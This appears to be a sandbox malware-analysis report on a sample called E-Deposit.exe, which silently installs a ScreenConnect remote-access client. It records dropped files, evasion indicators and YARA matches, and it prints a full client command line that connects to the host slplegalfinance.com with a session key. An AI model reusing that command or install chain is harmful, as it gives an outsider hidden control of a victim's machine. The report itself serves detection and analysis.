                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 14D0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 3250000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 2FD0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 6AB0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 6190000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 7AB0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 8AB0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 6AB0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 8D40000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 9D40000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMemory allocated: F50000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMemory allocated: 14D0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMemory allocated: 34D0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeMemory allocated: 2900000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeMemory allocated: 1A900000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8F8F.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI8413.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI89E1.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\E-Deposit.exeAPI coverage: 2.1 %
                                  Source: C:\Users\user\Desktop\E-Deposit.exe TID: 4332Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 1996Thread sleep count: 36 > 30Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 6592Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeLast function: Thread delayed
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeLast function: Thread delayed
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: ScreenConnect.ClientService.exe, 00000008.00000002.3294876651.00000000049F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
                                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: page read and write | page guardJump to behavior

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Source: 0.2.E-Deposit.exe.3200000.0.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                                  Source: 0.0.E-Deposit.exe.33c3d4.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                                  Source: 0.0.E-Deposit.exe.33c3d4.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                                  Source: 0.0.E-Deposit.exe.33c3d4.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                                  Source: 0.0.E-Deposit.exe.33c3d4.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                                  Source: 0.0.E-Deposit.exe.33c3d4.5.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"Jump to behavior
                                  Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.clientservice.exe" "?e=access&y=guest&h=slplegalfinance.com&p=443&s=2d5fcbc9-2c6e-47f4-840c-d5cb02c072a5&k=bgiaaackaabsu0exaagaaaeaaqdvyezobln8wdm6xwdr4b0uasubfhp2ejosdzugmbruwvwehsuh2lvfcfwdygcjbhcbews%2fdmahacpw1tkv%2f%2bw18tijthn%2bq%2fezavwugchdfdkaqki0lnydddccsozul7%2bvqevv9snfahoisjld7xdnlpmsw%2bw682fijikr8xbdhppukmg4ksp6kf1xba7kkmnnwss1mrxckdb%2f1hqrui%2fszzdgbjvz3tc%2f3cr0lxlngeclg7dt5irihwzjf5xutinhipesoo6bsk%2bufoecyo3bjvu6prl6uky08mjz7e%2b6foqb4actm6qtr9k%2fsvfdvwq%2br7eykwxpsy6ith4x7%2f%2bv"
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2064444724.0000000000772000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Progman
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2064444724.0000000000772000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                                  Source: C:\Users\user\Desktop\E-Deposit.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 8_2_05311114 CreateNamedPipeW,8_2_05311114
                                  Source: C:\Users\user\Desktop\E-Deposit.exeCode function: 0_2_05B52D07 RtlGetVersion,0_2_05B52D07
                                  Source: C:\Users\user\Desktop\E-Deposit.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                                  Source: Yara matchFile source: E-Deposit.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.2.E-Deposit.exe.5c60000.7.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.770000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.2.ScreenConnect.WindowsClient.exe.297fa10.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.E-Deposit.exe.5c60000.7.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.E-Deposit.exe.365db0.3.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.E-Deposit.exe.2b63d4.4.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.E-Deposit.exe.33c3d4.5.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.E-Deposit.exe.2a0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.2031799419.0000000005C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000000.2064444724.0000000000772000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000002.3269847777.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.2005812083.00000000002B6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.2035925464.0000000007AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.2023342394.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: E-Deposit.exe PID: 6480, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3748, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 1496, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFF423B0FC94823B9E.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF41AC279AF635B4E9.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF509A2F73A7E7DE00.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFD2EA35DDCAE5FE75.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF54E32773D5EE9706.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF38B6B2BED31E9ACC.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Config.Msi\598741.rbs, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Installer\MSI89D0.tmp, type: DROPPED
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity InformationAcquire Infrastructure1
                                  Valid Accounts
                                  1
                                  Native API
                                  1
                                  DLL Side-Loading
                                  1
                                  DLL Side-Loading
                                  11
                                  Disable or Modify Tools
                                  OS Credential Dumping11
                                  Peripheral Device Discovery
                                  Remote Services11
                                  Archive Collected Data
                                  22
                                  Encrypted Channel
                                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomains1
                                  Replication Through Removable Media
                                  12
                                  Command and Scripting Interpreter
                                  1
                                  DLL Search Order Hijacking
                                  1
                                  DLL Search Order Hijacking
                                  1
                                  Deobfuscate/Decode Files or Information
                                  LSASS Memory1
                                  File and Directory Discovery
                                  Remote Desktop ProtocolData from Removable Media1
                                  Non-Application Layer Protocol
                                  Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain AccountsAt1
                                  Component Object Model Hijacking
                                  1
                                  Component Object Model Hijacking
                                  1
                                  Obfuscated Files or Information
                                  Security Account Manager14
                                  System Information Discovery
                                  SMB/Windows Admin SharesData from Network Shared Drive2
                                  Application Layer Protocol
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal AccountsCron1
                                  Valid Accounts
                                  1
                                  Valid Accounts
                                  1
                                  Software Packing
                                  NTDS1
                                  Security Software Discovery
                                  Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchd2
                                  Windows Service
                                  1
                                  Access Token Manipulation
                                  1
                                  Timestomp
                                  LSA Secrets2
                                  Process Discovery
                                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                                  Bootkit
                                  2
                                  Windows Service
                                  1
                                  DLL Side-Loading
                                  Cached Domain Credentials31
                                  Virtualization/Sandbox Evasion
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items13
                                  Process Injection
                                  1
                                  DLL Search Order Hijacking
                                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                  File Deletion
                                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt22
                                  Masquerading
